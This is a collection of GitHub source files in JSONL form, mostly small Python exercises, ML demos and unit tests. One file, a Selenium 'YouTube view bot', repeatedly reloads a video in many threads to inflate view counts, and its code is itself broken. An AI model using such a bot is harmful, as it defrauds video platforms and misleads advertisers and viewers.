y=car.ycor())\n\n def level_up(self):\n self.car_speed += MOVE_INCREMENT","repo_name":"arnoldas/python-bootcamp-2023","sub_path":"Day-23-Turtle-Crossing-Game/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41933466648","text":"import matplotlib.pyplot as plt\nfrom sksurv.datasets import load_breast_cancer\nfrom sksurv.preprocessing import OneHotEncoder\nfrom sksurv.linear_model import CoxnetSurvivalAnalysis\n\nX, y = load_breast_cancer()\nX = OneHotEncoder().fit_transform(X)\n\nestimator = CoxnetSurvivalAnalysis(l1_ratio=0.99, fit_baseline_model=True)\nestimator.fit(X, y)\n\nchf_funcs = {}\nfor alpha in estimator.alphas_[:5]:\n chf_funcs[alpha] = estimator.predict_cumulative_hazard_function(\n X.iloc[:1], alpha=alpha)\n\n\nfor alpha, chf_alpha in chf_funcs.items():\n for fn in chf_alpha:\n plt.step(fn.x, fn(fn.x), where=\"post\",\n label=f\"alpha = {alpha:.3f}\")\n\nplt.ylim(0, 1)\nplt.legend()\nplt.show()","repo_name":"aleksejalex/ske_assignment","sub_path":"testing_Cox_from_sklearn.py","file_name":"testing_Cox_from_sklearn.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31805092167","text":"# Uses python3\n__author__ = 'kwheelerj'\nimport sys\n\ndef get_majority_element(a, left, right):\n\tif left == right:\n\t\treturn -1\n\tif left + 1 == right:\n\t\treturn a[left]\n\n\t# countArray = [0] * n\n\tcountDict = {}\n\tfor i in range(left, right):\n\t\tif str(a[i]) not in countDict.keys():\n\t\t\tcountDict[str(a[i])] = 0\n\t\tcountDict[str(a[i])] += 1\n\t# print(countDict)\n\t_max = 0\n\tkey = ''\n\tfor _key in countDict.keys():\n\t\tif countDict[_key] > _max:\n\t\t\t_max = countDict[_key]\n\t\t\tkey = _key\n\t# print('majority must be greater than ' + str(right // 2))\n\t# print('max is ' + str(_max))\n\tif _max > right // 2:\n\t\treturn countDict[key]\n\treturn -1\n\nif __name__ == '__main__':\n\tinput = sys.stdin.read()\n\tn, *a = list(map(int, input.split()))\n\t# inp = input()\n\t# n, *a = list(map(int, inp.split()))\n\tif get_majority_element(a, 0, n) != -1:\n\t\tprint(1)\n\telse:\n\t\tprint(0)\n","repo_name":"kwheelerj/Python_Algorithms","sub_path":"assignment03/majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73841535474","text":"# Print out all prime numbers up to 100\nimport math\n\n# First simplistic iteration\ndef simple_primes(num):\n prime = True\n for i in range(2, num):\n if (num % i == 0):\n prime = False\n if (prime):\n print(num)\n\n# Pythonic version\ndef pythonic_primes1(num):\n if all(num % i != 0 for i in range(2, num)):\n print(num)\n\n# only checking 2 to sqrt(num)\ndef pythonic_primes2(num):\n if all(num % i != 0 for i in range(2, int(math.sqrt(num)) + 1)):\n print(num)\n\n# The real optimum implementation - Sieving\ndef sieve_primes(num):\n sieve = [True] * (num + 1)\n for prime in range(2, num + 1):\n if (sieve[prime]):\n print(prime)\n for i in range(prime, num + 1, prime):\n sieve[i] = False\n\n# Iterative version of prime generation\ndef gen_primes():\n# Sieve of Eratosthenes\n# Code by David Eppstein, UC Irvine, 28 Feb 2002\n# http://code.activestate.com/recipes/117119/\n D = {}\n q = 2\n while True:\n if q not in D:\n yield q\n D[q * q] = [q]\n else:\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 1\n\nif __name__ == \"__main__\":\n input_number = input('Enter the range: ')\n sieve_primes(int(input_number))\n print(\"------End Sequence------\")\n\n for index, n in zip(range(100), gen_primes()):\n print(index, n)\n","repo_name":"BenWarwick-Champion/CodeChallenges","sub_path":"prime_numbers.py","file_name":"prime_numbers.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36537289145","text":"from flask import Flask, render_template,redirect,request,url_for,session,jsonify,send_file\r\nfrom Project1 import test_sample\r\nfrom Project1 import logreg\r\nfrom Project1 import model1\r\nfrom Project1 import model2\r\nfrom Project1 import RFC\r\nfrom Project1 import classifier_linear\r\nfrom Project1 import csv_predict\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/', methods=['POST', 'GET'])\r\ndef home():\r\n if request.method == 'POST':\r\n option = request.form['options']\r\n option=str(option)\r\n print(\"OPTION IS ==== \", option)\r\n senti=request.form['sentence']\r\n if option == \"logreg\":\r\n flag=test_sample(logreg, senti)\r\n elif option == \"RFC\":\r\n flag=test_sample(RFC, senti)\r\n elif option == \"classifier_linear\":\r\n flag=test_sample(classifier_linear, senti)\r\n elif option == \"file_upload\":\r\n f = request.files['filename']\r\n csv_predict(f)\r\n flag=2\r\n return render_template('index.html',flag=flag,senti=senti)\r\n else:\r\n return render_template('index.html',flag=-1)\r\n\r\n@app.route('/download')\r\ndef download():\r\n\tpath = \"./Predicted.csv\"\r\n\treturn send_file(path, as_attachment=True)\r\n\r\nif __name__ == \"__main__\":\r\n app.secret_key='arun'\r\n app.run(debug=True)","repo_name":"ThakkarJAY1/Sentiment-Analysis-","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34069448177","text":"\nN, M = map(int, input().split())\n#N, M = 4, 2\n# N까지 번호가 적힌 구슬, 이중에 M 개를 뽑는 방법의 수\n\nmarvel =[]\nfor i in range(1, N+1):\n marvel.append(i)\ncount = 0\ndef cal(arr, idx):\n if M == len(arr):\n global count\n count += 1\n for ele in arr:\n print(ele, end=\" \")\n print()\n return\n if idx >= N:\n return\n arr.append( marvel[idx] )\n cal(arr, idx+1)\n arr.pop()\n cal(arr, idx+1)\n\narr = []\ncal(arr, 0)\nprint(count)\n\n\n","repo_name":"moon-1105/firstPython","sub_path":"section6/10. 조합구하기_moon.py","file_name":"10. 조합구하기_moon.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29300809700","text":"from matplotlib.ticker import FuncFormatter\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n# some_file.py\r\nimport sys\r\nimport os\r\n\r\n\r\n# insert at 1, 0 is the script path (or '' in REPL)\r\n#sys.path.insert(0, \"E:\\Python\\Data\")\r\ndata_path = os.path.join(os.path.dirname(__file__), '../Data')\r\nsys.path.append(data_path)\r\n\r\nimport ReadFile as rf\r\n\r\n# region Parsing of the file\r\nfrom scipy.spatial import distance\r\ndef KNN(trainingData, image):\r\n aux = 10000.0\r\n valueTest = \"\"\r\n for i in trainingData:\r\n tmp = distance.euclidean(i.Data, image)\r\n if tmp < aux:\r\n aux = tmp\r\n valueTest = i.Name\r\n\r\n return valueTest\r\n\r\n\r\n\r\n\r\ndef main():\r\n trainingData = rf.ReadFile(os.path.join(data_path ,\"optdigits.tra\")) # Extract Training Data\r\n testingData = rf.ReadFile(os.path.join(data_path , \"optdigits.tes\")) # Extract Testing Data\r\n Errors = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # Errors per number\r\n Occurs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # Number of occurs per number\r\n MaxTotalError = 0\r\n\r\n Bar = np.arange(11)\r\n X = np.arange(11)\r\n\r\n for i in testingData:\r\n value = i.Name\r\n newValue = KNN(trainingData, i.Data)\r\n Occurs[int(i.Name)] += 1\r\n if value != newValue:\r\n MaxTotalError += 1\r\n Errors[int(i.Name)] += 1\r\n print(value + \"//\" + newValue)\r\n\r\n print(\"Accuracy on the testing set with k-nn :\")\r\n Accuracy = 100 - ((MaxTotalError / len(testingData)) * 100)\r\n print(Accuracy)\r\n\r\n X[len(X) - 1] = Accuracy\r\n for i in range(len(Errors)):\r\n print(\"Accuracy on the testing \" + str(i))\r\n x = 100 - (Errors[i] / Occurs[i] * 100)\r\n X[i] = x\r\n print(x)\r\n\r\n # Show Data Graph\r\n plt.bar(Bar, X)\r\n plt.xticks(Bar, ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'Total'])\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"R1C4RDO13/Python_APA","sub_path":"KNN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26723087674","text":"\"\"\"Module describing logical banking actions (to be used in routes).\"\"\"\nfrom ..common.utils import convert_date_to_midnight_timestamp\nfrom .accounts import BankAccountHandler, BankAccountTypeHandler\n\n\ndef get_bank_account_type_grouping(bank):\n \"\"\"Get a summary of accounts for the given bank, grouped by type.\"\"\"\n # Get a grouping (by account type) of accounts at the given bank\n type_accounts = {}\n for account_type in BankAccountTypeHandler.get_types_for_bank(bank.id):\n # Get only accounts for the logged in user and the given bank\n type_accounts[account_type] = BankAccountHandler.get_accounts(\n bank_ids=(bank.id,),\n account_type_ids=(account_type.id,),\n )\n return type_accounts\n\n\ndef get_balance_chart_data(transactions):\n \"\"\"\n Build a dataset to be passed to a `chartist.js` chart constructor.\n\n Parameters\n ----------\n transactions : list\n A list of transactions to be used for generating the chart data.\n\n Returns\n -------\n chart_data : list\n A list of sorted (x, y) pairs consisting of the Unix timestamp\n (in milliseconds) and the bank account balance.\n \"\"\"\n chart_data = sorted(map(_make_transaction_balance_ordered_pair, transactions))\n return chart_data\n\n\ndef _make_transaction_balance_ordered_pair(transaction):\n # Create an ordered pair of date (timestamp) and account balance\n timestamp = convert_date_to_midnight_timestamp(\n transaction.transaction_date, milliseconds=True\n )\n return timestamp, transaction.balance\n","repo_name":"mitchnegus/monopyly","sub_path":"monopyly/banking/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35949115261","text":"from io import BytesIO\n\nfrom audio_purifier import purify, purify_and_export\nfrom pydub import AudioSegment\n\n\ndef test_purify_wav_file_successfully():\n raw_wav_audio_path = \"tests/data/raw_audio.wav\"\n raw_audio_segment = AudioSegment.from_file(raw_wav_audio_path)\n assert int(len(raw_audio_segment) / 1000) == 16\n\n result_byte_io = purify(raw_wav_audio_path)\n\n processed_audio_segment = AudioSegment.from_file(result_byte_io)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_other_than_wav_file_successfully():\n other_audio_path = \"tests/data/raw_audio.m4a\"\n other_audio_segment = AudioSegment.from_file(other_audio_path)\n assert int(len(other_audio_segment) / 1000) == 16\n\n result_byte_io = purify(other_audio_path, export_format=\"mp3\")\n\n processed_audio_segment = AudioSegment.from_file(result_byte_io)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_silences_return_none():\n silences_audio_path = \"tests/data/silences.m4a\"\n raw_audio_segment = AudioSegment.from_file(silences_audio_path)\n assert int(len(raw_audio_segment) / 1000) == 4\n\n result_byte_io = purify(silences_audio_path, export_format=\"mp3\")\n\n assert result_byte_io is None\n\n\ndef test_purify_and_export_wav_file_successfully():\n exported_wav_file = BytesIO()\n\n assert exported_wav_file.getvalue() == b\"\"\n\n raw_wav_audio_path = \"tests/data/raw_audio.wav\"\n\n purify_and_export(raw_wav_audio_path, exported_wav_file)\n\n assert exported_wav_file.getvalue()\n exported_wav_file.seek(0)\n\n processed_audio_segment = AudioSegment.from_file(exported_wav_file)\n assert int(len(processed_audio_segment) / 1000) == 5\n\n\ndef test_purify_and_export_other_than_wav_file_successfully():\n exported_mp3_file = BytesIO()\n\n assert exported_mp3_file.getvalue() == b\"\"\n\n raw_wav_audio_path = \"tests/data/raw_audio.m4a\"\n\n purify_and_export(raw_wav_audio_path, exported_mp3_file, export_format=\"mp3\")\n\n assert exported_mp3_file.getvalue()\n exported_mp3_file.seek(0)\n\n processed_audio_segment = AudioSegment.from_file(exported_mp3_file)\n assert int(len(processed_audio_segment) / 1000) == 5\n","repo_name":"huynguyengl99/audio-purifier","sub_path":"tests/test_purifier.py","file_name":"test_purifier.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18583739477","text":"from selenium import webdriver\r\nimport time\r\nimport random\r\nimport threading\r\n\r\ndriver = 'driver/chromedriver'\r\n\r\nprint('How many views you want? |Terminate by STOP')\r\nwhile True:\r\n views = input('')\r\n if views == 'STOP':\r\n break\r\n\r\nprint('Enter URL |Terminate by STOP')\r\nwhile True:\r\n url = input('')\r\n if url == 'STOP':\r\n break\r\n\r\n\r\ndef viewVideo(browser):\r\n while(True):\r\n browser.get(url)\r\n time.sleep(random.randint(4, 11))\r\n\r\n\r\nfor i in range(views):\r\n browserThread = threading.Thread(\r\n target=viewVideo, args=(webdriver.Chrome(driver)))\r\n browserThread.start()\r\n\r\ntime.sleep(random.randint(180, 430))\r\n","repo_name":"Grossnicklaus/YouTube_View_Bot","sub_path":"YouTubeViewBot/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18055921213","text":"# stel de vraag ? aan de gebruiker\n# zolang er geen quit word geantwoord stel je vraag opnieuw\n# print het aantal keer dat de vraag is gesteld\n\naantal = 0\nquestion = input(\"?\")\nwhile True:\n if question == \"quit\":\n print(aantal)\n quit()\n else:\n aantal +=1\n question = input(\"?\")\n \n \n\n\n\n\n\n","repo_name":"Bartkuip/leren_programmeren","sub_path":"03_keer_op_keer/quit.py","file_name":"quit.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22745239416","text":"import sys\nsys.stdin = open('input.txt')\n\ndef bingo():\n cnt = 0\n for i in range(5):\n tmp = 0\n for j in range(5):\n tmp += check[i][j]\n if tmp == 5:\n cnt += 1\n for i in range(5):\n tmp = 0\n for j in range(5):\n tmp += check[j][i]\n if tmp == 5:\n cnt += 1\n tmp = 0\n for i in range(5):\n tmp += check[i][i]\n if tmp == 5:\n cnt += 1\n tmp = 0\n for i in range(5):\n tmp += check[4-i][i]\n if tmp == 5:\n cnt += 1\n if cnt >= 3:\n return True\n else:\n return False\nbingo_board = []\nnum = []\nfor _ in range(5):\n bingo_board += list(map(int, input().split()))\n\nfor _ in range(5):\n num += list(map(int, input().split()))\ncheck = [[0]*5 for _ in range(5)]\n\nfor i in range(25):\n idx = bingo_board.index(num[i])\n row, col = idx//5, idx%5\n check[row][col] = 1\n if bingo():\n break\nprint(i+1)","repo_name":"QT-HH/Algorithm","sub_path":"BOJ/2578_빙고/2578_빙고_3.py","file_name":"2578_빙고_3.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"8362463170","text":"#!/usr/bin/env python\n'''unit testing code for pysam.\n\nExecute in the :file:`tests` directory as it requires the Makefile\nand data files located there.\n'''\n\nimport sys, os, shutil, gzip\nimport pysam\nimport unittest\nimport itertools\nimport subprocess\n\ndef checkBinaryEqual( filename1, filename2 ):\n '''return true if the two files are binary equal.'''\n if os.path.getsize( filename1 ) != os.path.getsize( filename2 ):\n return False\n\n infile1 = open(filename1, \"rb\")\n infile2 = open(filename2, \"rb\")\n\n def chariter( infile ):\n while 1:\n c = infile.read(1)\n if c == \"\": break\n yield c\n\n found = False\n for c1,c2 in itertools.izip( chariter( infile1), chariter( infile2) ):\n if c1 != c2: break\n else:\n found = True\n\n infile1.close()\n infile2.close()\n return found\n\nclass TestIndexing(unittest.TestCase):\n filename = \"example.gtf.gz\" \n filename_idx = \"example.gtf.gz.tbi\" \n\n def setUp( self ):\n \n self.tmpfilename = \"tmp_%i.gtf.gz\" % id(self)\n shutil.copyfile( self.filename, self.tmpfilename )\n\n def testIndexPreset( self ):\n '''test indexing via preset.'''\n\n pysam.tabix_index( self.tmpfilename, preset = \"gff\" )\n checkBinaryEqual( self.tmpfilename + \".tbi\", self.filename_idx )\n\n def tearDown( self ):\n os.unlink( self.tmpfilename )\n os.unlink( self.tmpfilename + \".tbi\" )\n\nclass TestCompression(unittest.TestCase):\n filename = \"example.gtf.gz\" \n filename_idx = \"example.gtf.gz.tbi\" \n\n def setUp( self ):\n \n self.tmpfilename = \"tmp_%i.gtf\" % id(self)\n infile = gzip.open( self.filename, \"r\")\n outfile = open( self.tmpfilename, \"w\" )\n outfile.write( \"\".join(infile.readlines()) )\n outfile.close()\n infile.close()\n\n def testIndexPreset( self ):\n '''test indexing via preset.'''\n\n pysam.tabix_index( self.tmpfilename, preset = \"gff\" )\n checkBinaryEqual( self.tmpfilename + \".gz\", self.filename )\n checkBinaryEqual( self.tmpfilename + \".gz.tbi\", self.filename_idx )\n\n def tearDown( self ):\n os.unlink( self.tmpfilename + \".gz\" )\n os.unlink( self.tmpfilename + \".gz.tbi\" )\n\nclass TestIteration( unittest.TestCase ):\n\n filename = \"example.gtf.gz\" \n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n lines = [ x for x in gzip.open(self.filename).readlines() if not x.startswith(\"#\") ]\n # creates index of contig, start, end, adds content without newline.\n self.compare = [ \n (x[0][0], int(x[0][3]), int(x[0][4]), x[1]) \n for x in [ (y.split(\"\\t\"), y[:-1]) for y in lines ] ]\n \n def getSubset( self, contig = None, start = None, end = None):\n \n if contig == None:\n # all lines\n subset = [ x[3] for x in self.compare ]\n else:\n if start != None and end == None:\n # until end of contig\n subset = [ x[3] for x in self.compare if x[0] == contig and x[2] > start ]\n elif start == None and end != None:\n # from start of contig\n subset = [ x[3] for x in self.compare if x[0] == contig and x[1] <= end ]\n elif start == None and end == None:\n subset = [ x[3] for x in self.compare if x[0] == contig ]\n else:\n # all within interval\n subset = [ x[3] for x in self.compare if x[0] == contig and \\\n min( x[2], end) - max(x[1], start) > 0 ]\n \n return subset\n\n def checkPairwise( self, result, ref ):\n\n result.sort()\n ref.sort()\n\n a = set(result)\n b = set(ref)\n\n self.assertEqual( len(result), len(ref),\n \"unexpected number of results: %i, expected %i, differences are %s: %s\" \\\n % (len(result), len(ref),\n a.difference(b), \n b.difference(a) ))\n\n for x, d in enumerate( zip( result, ref )):\n self.assertEqual( d[0], d[1],\n \"unexpected results in pair %i: '%s', expected '%s'\" % \\\n (x, \n d[0], \n d[1]) )\n\n\n def testAll( self ):\n result = list(self.tabix.fetch())\n ref = self.getSubset( )\n self.checkPairwise( result, ref )\n\n def testPerContig( self ):\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n result = list(self.tabix.fetch( contig ))\n ref = self.getSubset( contig )\n self.checkPairwise( result, ref )\n \n def testPerContigToEnd( self ):\n \n end = None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for start in range( 0, 200000, 1000):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n\n def testPerContigFromStart( self ):\n \n start = None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for end in range( 0, 200000, 1000):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n\n def testPerContig( self ):\n \n start, end = None, None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n \n def testPerInterval( self ):\n \n start, end = None, None\n for contig in (\"chr1\", \"chr2\", \"chr1\", \"chr2\" ):\n for start in range( 0, 200000, 2000):\n for end in range( start, start + 2000, 500):\n result = list(self.tabix.fetch( contig, start, end ))\n ref = self.getSubset( contig, start, end )\n self.checkPairwise( result, ref )\n \n\n def testInvalidIntervals( self ):\n \n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", 0, -10)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", -10, 200)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", 200, 0)\n self.assertRaises( ValueError, self.tabix.fetch, \"chr1\", -10, -20)\n self.assertRaises( ValueError, self.tabix.fetch, \"chrUn\" )\n\n def testGetContigs( self ):\n self.assertEqual( sorted(self.tabix.contigs), [\"chr1\", \"chr2\"] )\n # check that contigs is read-only\n self.assertRaises( AttributeError, setattr, self.tabix, \"contigs\", [\"chr1\", \"chr2\"] )\n\n def testHeader( self ):\n ref = []\n for x in gzip.open( self.filename ):\n if not x.startswith(\"#\"): break\n ref.append( x[:-1] )\n header = list( self.tabix.header )\n self.assertEqual( ref, header )\n\n def testReopening( self ):\n '''test repeated opening of the same file.'''\n def func1():\n # opens any tabix file\n inf = pysam.Tabixfile(self.filename)\n return\n\n for i in range(10000):\n func1()\n\n\nclass TestParser( unittest.TestCase ):\n\n filename = \"example.gtf.gz\" \n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n self.compare = [ x[:-1].split(\"\\t\") for x in gzip.open( self.filename, \"r\") if not x.startswith(\"#\") ]\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n self.assertEqual( len(self.compare[x]), len(r) )\n\n # test indexing\n for c in range(0,len(r)):\n self.assertEqual( self.compare[x][c], r[c] )\n\n # test slicing access\n for c in range(0, len(r)-1):\n for cc in range(c+1, len(r)):\n self.assertEqual( self.compare[x][c:cc],\n r[c:cc] )\n\n def testWrite( self ):\n \n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n c = list(r)\n for y in range(len(r)):\n r[y] = \"test_%05i\" % y\n c[y] = \"test_%05i\" % y\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join( c ), str(r) )\n # check second assignment\n for y in range(len(r)):\n r[y] = \"test_%05i\" % y\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join( c ), str(r) )\n\n def testUnset( self ):\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asTuple() )):\n self.assertEqual( self.compare[x], list(r) )\n c = list(r)\n e = list(r)\n for y in range(len(r)):\n r[y] = c[y] = None\n e[y] = \"\"\n self.assertEqual( c, list(r) )\n self.assertEqual( \"\\t\".join(e), str(r) )\n\nclass TestGTF( TestParser ):\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asGTF() )):\n c = self.compare[x]\n \n self.assertEqual( len(c), len(r) )\n self.assertEqual( \"\\t\".join(c), str(r) )\n self.assertTrue( r.gene_id.startswith(\"ENSG\") )\n if r.feature != \"gene\":\n self.assertTrue( r.transcript_id.startswith(\"ENST\") )\n self.assertEqual( c[0], r.contig )\n\nclass TestBed( unittest.TestCase ):\n filename = \"example.bed.gz\"\n\n def setUp( self ):\n\n self.tabix = pysam.Tabixfile( self.filename )\n self.compare = [ x[:-1].split(\"\\t\") for x in gzip.open( self.filename, \"r\") if not x.startswith(\"#\") ]\n\n def testRead( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asBed() )):\n c = self.compare[x]\n self.assertEqual( \"\\t\".join( c ), str(r) )\n self.assertEqual( list(c), list(r) )\n self.assertEqual( c[0], r.contig)\n self.assertEqual( int(c[1]), r.start)\n self.assertEqual( int(c[2]), r.end)\n\n def testWrite( self ):\n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asBed() )):\n c = self.compare[x]\n self.assertEqual( \"\\t\".join( c ), str(r) )\n self.assertEqual( list(c), list(r) )\n\n r.contig = \"test\"\n self.assertEqual( \"test\", r.contig)\n self.assertEqual( \"test\", r[0])\n\n r.start += 1\n self.assertEqual( int(c[1]) + 1, r.start )\n self.assertEqual( str(int(c[1]) + 1), r[1] )\n\n r.end += 1\n self.assertEqual( int(c[2]) + 1, r.end )\n self.assertEqual( str(int(c[2]) + 1), r[2] )\n\nclass TestVCF( TestParser ):\n\n filename = \"example.vcf40.gz\"\n columns = (\"contig\", \"pos\", \"id\", \n \"ref\", \"alt\", \"qual\", \n \"filter\", \"info\", \"format\" )\n\n def testRead( self ):\n \n ncolumns = len(self.columns) \n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asVCF() )):\n c = self.compare[x]\n for y, field in enumerate( self.columns ):\n if field == \"pos\":\n self.assertEqual( int(c[y]) - 1, getattr( r, field ) )\n self.assertEqual( int(c[y]) - 1, r.pos )\n else:\n self.assertEqual( c[y], getattr( r, field ), \n \"mismatch in field %s: %s != %s\" %\\\n ( field,c[y], getattr( r, field ) ) )\n self.assertEqual( len(c), len( r ) + ncolumns )\n \n for y in range(len(c) - ncolumns):\n self.assertEqual( c[ncolumns+y], r[y] )\n \n def testWrite( self ):\n\n ncolumns = len(self.columns) \n\n for x, r in enumerate(self.tabix.fetch( parser = pysam.asVCF() )):\n\n c = self.compare[x]\n\n # check unmodified string\n ref_string = \"\\t\".join( c )\n cmp_string = str(r)\n self.assertEqual( ref_string, cmp_string )\n\n # set fields and compare field-wise\n for y, field in enumerate( self.columns ):\n if field == \"pos\":\n rpos = getattr( r, field )\n self.assertEqual( int(c[y]) - 1, rpos )\n self.assertEqual( int(c[y]) - 1, r.pos )\n # increment pos by 1\n setattr( r, field, rpos + 1 )\n self.assertEqual( getattr( r, field ), rpos + 1 )\n c[y] = str(int(c[y]) + 1 ) \n else:\n setattr( r, field, \"test_%i\" % y)\n c[y] = \"test_%i\" % y\n self.assertEqual( c[y], getattr( r, field ), \n \"mismatch in field %s: %s != %s\" %\\\n ( field,c[y], getattr( r, field ) ) )\n\n self.assertEqual( len(c), len( r ) + ncolumns )\n \n for y in range(len(c) - ncolumns):\n c[ncolumns+y] = \"test_%i\" % y\n r[y] = \"test_%i\" % y\n self.assertEqual( c[ncolumns+y], r[y] )\n\nclass TestVCF( TestParser ):\n\n filename = \"example.vcf40.gz\"\n\n def testOpening( self ):\n while 1:\n infile = pysam.Tabixfile( self.filename )\n infile.close()\n\n \n # check strings\n ref_string = \"\\t\".join( c )\n cmp_string = str(r)\n \n self.assertEqual( ref_string, cmp_string )\n\nif __name__ == \"__main__\":\n\n unittest.main()\n\n\n","repo_name":"NYU-BFX/RNA-Seq_Standard","sub_path":"code/utilities/CPAT-1.2.2/lib/tests/tabix_test.py","file_name":"tabix_test.py","file_ext":"py","file_size_in_byte":13978,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"39"} +{"seq_id":"29669700227","text":"team_name = 'Team21'\nstrategy_name = 'Betray 90% unless Colluded within last 10 rounds.'\nstrategy_description = strategy_name\n\nimport random\n\n\ndef move(my_history, their_history, my_score, their_score):\n\n if 'c' in their_history[-10:]: \n return 'c' \n else:\n if random.random()<0.1: \n return 'c' \n else:\n return 'b' \n","repo_name":"CSP-ESUMS-Bourhrous/iterative-prisoners-dilemma-2A","sub_path":"Team21.py","file_name":"Team21.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"70657085234","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.forms import Select, SelectMultiple\n\nimport unittest\n\nfrom package.models import Version\n\nfrom crichtonweb.core.models import crichtonModel\nfrom crichtonweb.core.widgets import ReadOnlySelect, ReadOnlySelectMultiple\n\nclass crichtonTestCase(TestCase):\n def run_std_tsts(self, thing, test_admin=True):\n \n self.assertTrue(isinstance(thing, crichtonModel))\n \n if thing.has_api:\n # check that we can get at it through the REST API endpoint\n response = self.client.get(thing.get_api_url(\"xml\"))\n self.assertEqual(response.status_code, 200)\n \n # Check it has the other standard methods and they are callable\n thing.get_link()\n thing.get_absolute_url()\n thing.get_view_url()\n \n if test_admin:\n # create user\n from django.contrib.auth.models import User\n USERNAME = 'testuser'\n USEREMAIL = 'test@user.com'\n USERPW = 'testpw'\n \n if not User.objects.filter(username=USERNAME).exists():\n User.objects.create_superuser(USERNAME, USEREMAIL, USERPW)\n \n HTTP_SSLCLIENTCERTSUBJECT=\"Email=%s, CN=%s,\" % (USEREMAIL, USERNAME)\n \n # login\n c = Client()\n # SOCOM-160 this bit doesn't work:\n # c.login(username=USERNAME, password=USERPW)\n \n # and the Admin interface\n response = c.get(thing.get_absolute_url(), HTTP_SSLCLIENTCERTSUBJECT=HTTP_SSLCLIENTCERTSUBJECT)\n #self.assertEqual(response.content, \"XX\")\n self.assertEqual(response.status_code, 200)\n\nclass CoreWidgetsTest(crichtonTestCase):\n def test_readonlyselect_widget(self):\n choices = ((\"key1\",\"val1\"), (\"key2\",\"val2\"),(\"key3\",\"val3\"))\n widg = ReadOnlySelect(Select(choices=choices))\n # Single choice (regular select widget)\n output = widg.render(name=\"testname\", value=\"key2\")\n self.assertEqual(output, u'\\n')\n # Multiple choices:\n multiwidg = ReadOnlySelectMultiple(SelectMultiple(choices=choices))\n output = multiwidg.render(name=\"testname\", value=(\"key2\", \"key3\"))\n self.assertEqual(output, u'\\n\\n')\n\n# eof\n","repo_name":"bpluly/crichton","sub_path":"crichtonweb/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 